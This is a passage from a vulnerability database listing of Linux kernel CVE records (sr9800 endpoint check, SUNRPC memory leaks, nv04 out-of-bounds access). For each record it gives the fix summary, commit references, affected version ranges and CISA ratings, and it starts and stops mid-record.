                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-02-13T20:00:17.711402Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-693",
                "description": "CWE-693 Protection Mechanism Failure",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-07T21:07:20.990Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel before 6.6.7, an untrusted VMM can trigger int80 syscall handling at any given point. This is related to arch/x86/coco/tdx/tdx.c and arch/x86/mm/mem_encrypt_amd.c."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-02-12T04:13:07.238Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b82a8dbd3d2f4563156f7150c6f2ecab6e960b30"
        },
        {
          "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.6.7"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2024-25744",
    "datePublished": "2024-02-12T00:00:00.000Z",
    "dateReserved": "2024-02-12T00:00:00.000Z",
    "dateUpdated": "2025-05-07T21:07:20.990Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26651 (GCVE-0-2024-26651)

Vulnerability from cvelistv5 – Published: 2024-03-27 13:50 – Updated: 2025-11-04 22:05

Title

sr9800: Add check for usbnet_get_endpoints

Summary

In the Linux kernel, the following vulnerability has been resolved: sr9800: Add check for usbnet_get_endpoints Add check for usbnet_get_endpoints() and return the error if it fails in order to transfer the error.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/424eba06ed405d557…
	https://git.kernel.org/stable/c/8a8b6a24684bc2780…
	https://git.kernel.org/stable/c/6b4a39acafaf0186e…
	https://git.kernel.org/stable/c/276873ae26c8d75b0…
	https://git.kernel.org/stable/c/9c402819620a842cb…
	https://git.kernel.org/stable/c/e39a3a14eafcf17f0…
	https://git.kernel.org/stable/c/efba65777f9845777…
	https://git.kernel.org/stable/c/f546cc19f9b829752…
	https://git.kernel.org/stable/c/07161b2416f740a2c…

Impacted products

Vendor

Product

Version

Linux

Affected: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 , < 424eba06ed405d557077339edb19ce0ebe39e7c7 (git)
Affected: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 , < 8a8b6a24684bc278036c3f159f7b3a31ad89546a (git)
Affected: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 , < 6b4a39acafaf0186ed8e97c16e0aa6fca0e52009 (git)
Affected: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 , < 276873ae26c8d75b00747c1dadb9561d6ef20581 (git)
Affected: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 , < 9c402819620a842cbfe39359a3ddfaac9adc8384 (git)
Affected: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 , < e39a3a14eafcf17f03c037290b78c8f483529028 (git)
Affected: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 , < efba65777f98457773c5b65e3135c6132d3b015f (git)
Affected: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 , < f546cc19f9b82975238d0ba413adc27714750774 (git)
Affected: 19a38d8e0aa33b4f4d11d3b4baa902ad169daa80 , < 07161b2416f740a2cb87faa5566873f401440a61 (git)

Linux

Affected: 3.14
Unaffected: 0 , < 3.14 (semver)
Unaffected: 4.19.311 , ≤ 4.19.* (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26651",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T16:07:09.943432Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T16:07:20.055Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T22:05:59.931Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/424eba06ed405d557077339edb19ce0ebe39e7c7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8a8b6a24684bc278036c3f159f7b3a31ad89546a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6b4a39acafaf0186ed8e97c16e0aa6fca0e52009"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/276873ae26c8d75b00747c1dadb9561d6ef20581"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9c402819620a842cbfe39359a3ddfaac9adc8384"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e39a3a14eafcf17f03c037290b78c8f483529028"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/efba65777f98457773c5b65e3135c6132d3b015f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f546cc19f9b82975238d0ba413adc27714750774"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/07161b2416f740a2cb87faa5566873f401440a61"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AXURWFKAKFEIUBN7RTCXI7GZYAHXNBX5/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SI2D7K2T6QCWALKLYEWZ22P4UXMEBCGB/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/usb/sr9800.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "424eba06ed405d557077339edb19ce0ebe39e7c7",
              "status": "affected",
              "version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
              "versionType": "git"
            },
            {
              "lessThan": "8a8b6a24684bc278036c3f159f7b3a31ad89546a",
              "status": "affected",
              "version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
              "versionType": "git"
            },
            {
              "lessThan": "6b4a39acafaf0186ed8e97c16e0aa6fca0e52009",
              "status": "affected",
              "version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
              "versionType": "git"
            },
            {
              "lessThan": "276873ae26c8d75b00747c1dadb9561d6ef20581",
              "status": "affected",
              "version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
              "versionType": "git"
            },
            {
              "lessThan": "9c402819620a842cbfe39359a3ddfaac9adc8384",
              "status": "affected",
              "version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
              "versionType": "git"
            },
            {
              "lessThan": "e39a3a14eafcf17f03c037290b78c8f483529028",
              "status": "affected",
              "version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
              "versionType": "git"
            },
            {
              "lessThan": "efba65777f98457773c5b65e3135c6132d3b015f",
              "status": "affected",
              "version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
              "versionType": "git"
            },
            {
              "lessThan": "f546cc19f9b82975238d0ba413adc27714750774",
              "status": "affected",
              "version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
              "versionType": "git"
            },
            {
              "lessThan": "07161b2416f740a2cb87faa5566873f401440a61",
              "status": "affected",
              "version": "19a38d8e0aa33b4f4d11d3b4baa902ad169daa80",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/usb/sr9800.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.14"
            },
            {
              "lessThan": "3.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.311",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.311",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsr9800: Add check for usbnet_get_endpoints\n\nAdd check for usbnet_get_endpoints() and return the error if it fails\nin order to transfer the error."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:53:07.161Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/424eba06ed405d557077339edb19ce0ebe39e7c7"
        },
        {
          "url": "https://git.kernel.org/stable/c/8a8b6a24684bc278036c3f159f7b3a31ad89546a"
        },
        {
          "url": "https://git.kernel.org/stable/c/6b4a39acafaf0186ed8e97c16e0aa6fca0e52009"
        },
        {
          "url": "https://git.kernel.org/stable/c/276873ae26c8d75b00747c1dadb9561d6ef20581"
        },
        {
          "url": "https://git.kernel.org/stable/c/9c402819620a842cbfe39359a3ddfaac9adc8384"
        },
        {
          "url": "https://git.kernel.org/stable/c/e39a3a14eafcf17f03c037290b78c8f483529028"
        },
        {
          "url": "https://git.kernel.org/stable/c/efba65777f98457773c5b65e3135c6132d3b015f"
        },
        {
          "url": "https://git.kernel.org/stable/c/f546cc19f9b82975238d0ba413adc27714750774"
        },
        {
          "url": "https://git.kernel.org/stable/c/07161b2416f740a2cb87faa5566873f401440a61"
        }
      ],
      "title": "sr9800: Add check for usbnet_get_endpoints",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26651",
    "datePublished": "2024-03-27T13:50:50.833Z",
    "dateReserved": "2024-02-19T14:20:24.143Z",
    "dateUpdated": "2025-11-04T22:05:59.931Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-27388 (GCVE-0-2024-27388)

Vulnerability from cvelistv5 – Published: 2024-05-01 13:05 – Updated: 2025-05-04 09:03

Title

SUNRPC: fix some memleaks in gssx_dec_option_array

Summary

In the Linux kernel, the following vulnerability has been resolved: SUNRPC: fix some memleaks in gssx_dec_option_array The creds and oa->data need to be freed in the error-handling paths after their allocation. So this patch add these deallocations in the corresponding paths.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b97c37978ca825557…
	https://git.kernel.org/stable/c/bfa9d86d39a0fe468…
	https://git.kernel.org/stable/c/bb336cd8d5ecb69c4…
	https://git.kernel.org/stable/c/dd292e884c649f9b1…
	https://git.kernel.org/stable/c/934212a623cbab851…
	https://git.kernel.org/stable/c/5e6013ae2c8d420fa…
	https://git.kernel.org/stable/c/9806c2393cd2ab0a8…
	https://git.kernel.org/stable/c/996997d1fb2126fed…
	https://git.kernel.org/stable/c/3cfcfc102a5e57b02…

Impacted products

Vendor

Product

Version

Linux

Affected: 1d658336b05f8697d6445834f8867f8ad5e4f735 , < b97c37978ca825557d331c9012e0c1ddc0e42364 (git)
Affected: 1d658336b05f8697d6445834f8867f8ad5e4f735 , < bfa9d86d39a0fe4685f90c3529aa9bd62a9d97a8 (git)
Affected: 1d658336b05f8697d6445834f8867f8ad5e4f735 , < bb336cd8d5ecb69c430ebe3e7bcff68471d93fa8 (git)
Affected: 1d658336b05f8697d6445834f8867f8ad5e4f735 , < dd292e884c649f9b1c18af0ec75ca90b390cd044 (git)
Affected: 1d658336b05f8697d6445834f8867f8ad5e4f735 , < 934212a623cbab851848b6de377eb476718c3e4c (git)
Affected: 1d658336b05f8697d6445834f8867f8ad5e4f735 , < 5e6013ae2c8d420faea553d363935f65badd32c3 (git)
Affected: 1d658336b05f8697d6445834f8867f8ad5e4f735 , < 9806c2393cd2ab0a8e7bb9ffae02ce20e3112ec4 (git)
Affected: 1d658336b05f8697d6445834f8867f8ad5e4f735 , < 996997d1fb2126feda550d6adcedcbd94911fc69 (git)
Affected: 1d658336b05f8697d6445834f8867f8ad5e4f735 , < 3cfcfc102a5e57b021b786a755a38935e357797d (git)

Linux

Affected: 3.10
Unaffected: 0 , < 3.10 (semver)
Unaffected: 4.19.311 , ≤ 4.19.* (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:34:52.507Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b97c37978ca825557d331c9012e0c1ddc0e42364"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bfa9d86d39a0fe4685f90c3529aa9bd62a9d97a8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bb336cd8d5ecb69c430ebe3e7bcff68471d93fa8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dd292e884c649f9b1c18af0ec75ca90b390cd044"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/934212a623cbab851848b6de377eb476718c3e4c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5e6013ae2c8d420faea553d363935f65badd32c3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9806c2393cd2ab0a8e7bb9ffae02ce20e3112ec4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/996997d1fb2126feda550d6adcedcbd94911fc69"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3cfcfc102a5e57b021b786a755a38935e357797d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27388",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:43:49.125516Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:28.640Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/sunrpc/auth_gss/gss_rpc_xdr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b97c37978ca825557d331c9012e0c1ddc0e42364",
              "status": "affected",
              "version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
              "versionType": "git"
            },
            {
              "lessThan": "bfa9d86d39a0fe4685f90c3529aa9bd62a9d97a8",
              "status": "affected",
              "version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
              "versionType": "git"
            },
            {
              "lessThan": "bb336cd8d5ecb69c430ebe3e7bcff68471d93fa8",
              "status": "affected",
              "version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
              "versionType": "git"
            },
            {
              "lessThan": "dd292e884c649f9b1c18af0ec75ca90b390cd044",
              "status": "affected",
              "version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
              "versionType": "git"
            },
            {
              "lessThan": "934212a623cbab851848b6de377eb476718c3e4c",
              "status": "affected",
              "version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
              "versionType": "git"
            },
            {
              "lessThan": "5e6013ae2c8d420faea553d363935f65badd32c3",
              "status": "affected",
              "version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
              "versionType": "git"
            },
            {
              "lessThan": "9806c2393cd2ab0a8e7bb9ffae02ce20e3112ec4",
              "status": "affected",
              "version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
              "versionType": "git"
            },
            {
              "lessThan": "996997d1fb2126feda550d6adcedcbd94911fc69",
              "status": "affected",
              "version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
              "versionType": "git"
            },
            {
              "lessThan": "3cfcfc102a5e57b021b786a755a38935e357797d",
              "status": "affected",
              "version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/sunrpc/auth_gss/gss_rpc_xdr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.10"
            },
            {
              "lessThan": "3.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.311",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.311",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: fix some memleaks in gssx_dec_option_array\n\nThe creds and oa-\u003edata need to be freed in the error-handling paths after\ntheir allocation. So this patch add these deallocations in the\ncorresponding paths."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:03:54.661Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b97c37978ca825557d331c9012e0c1ddc0e42364"
        },
        {
          "url": "https://git.kernel.org/stable/c/bfa9d86d39a0fe4685f90c3529aa9bd62a9d97a8"
        },
        {
          "url": "https://git.kernel.org/stable/c/bb336cd8d5ecb69c430ebe3e7bcff68471d93fa8"
        },
        {
          "url": "https://git.kernel.org/stable/c/dd292e884c649f9b1c18af0ec75ca90b390cd044"
        },
        {
          "url": "https://git.kernel.org/stable/c/934212a623cbab851848b6de377eb476718c3e4c"
        },
        {
          "url": "https://git.kernel.org/stable/c/5e6013ae2c8d420faea553d363935f65badd32c3"
        },
        {
          "url": "https://git.kernel.org/stable/c/9806c2393cd2ab0a8e7bb9ffae02ce20e3112ec4"
        },
        {
          "url": "https://git.kernel.org/stable/c/996997d1fb2126feda550d6adcedcbd94911fc69"
        },
        {
          "url": "https://git.kernel.org/stable/c/3cfcfc102a5e57b021b786a755a38935e357797d"
        }
      ],
      "title": "SUNRPC: fix some memleaks in gssx_dec_option_array",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27388",
    "datePublished": "2024-05-01T13:05:05.518Z",
    "dateReserved": "2024-02-25T13:47:42.676Z",
    "dateUpdated": "2025-05-04T09:03:54.661Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27008 (GCVE-0-2024-27008)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:29 – Updated: 2025-11-04 17:16

Title

drm: nv04: Fix out of bounds access

Summary

In the Linux kernel, the following vulnerability has been resolved: drm: nv04: Fix out of bounds access When Output Resource (dcb->or) value is assigned in fabricate_dcb_output(), there may be out of bounds access to dac_users array in case dcb->or is zero because ffs(dcb->or) is used as index there. The 'or' argument of fabricate_dcb_output() must be interpreted as a number of bit to set, not value. Utilize macros from 'enum nouveau_or' in calls instead of hardcoding. Found by Linux Verification Center (linuxtesting.org) with SVACE.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c2b97f26f081ceec3…
	https://git.kernel.org/stable/c/5050ae879a828d752…
	https://git.kernel.org/stable/c/097c7918fcfa1dee2…
	https://git.kernel.org/stable/c/df0991da7db846f7f…
	https://git.kernel.org/stable/c/5fd4b090304e450aa…
	https://git.kernel.org/stable/c/6690cc2732e2a8d0e…
	https://git.kernel.org/stable/c/26212da39ee14a52c…
	https://git.kernel.org/stable/c/cf92bb778eda7830e…

Impacted products

Vendor

Product

Version

Linux

Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < c2b97f26f081ceec3298151481687071075a25cb (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < 5050ae879a828d752b439e3827aac126709da6d1 (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < 097c7918fcfa1dee233acfd1f3029f00c3bc8062 (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < df0991da7db846f7fa4ec6740350f743d3b69b04 (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < 5fd4b090304e450aa0e7cc9cc2b4873285c6face (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < 6690cc2732e2a8d0eaca44dcbac032a4b0148042 (git)
Affected: 2e5702aff39532662198459726c624d5eadbdd78 , < 26212da39ee14a52c76a202c6ae5153a84f579a5 (git)
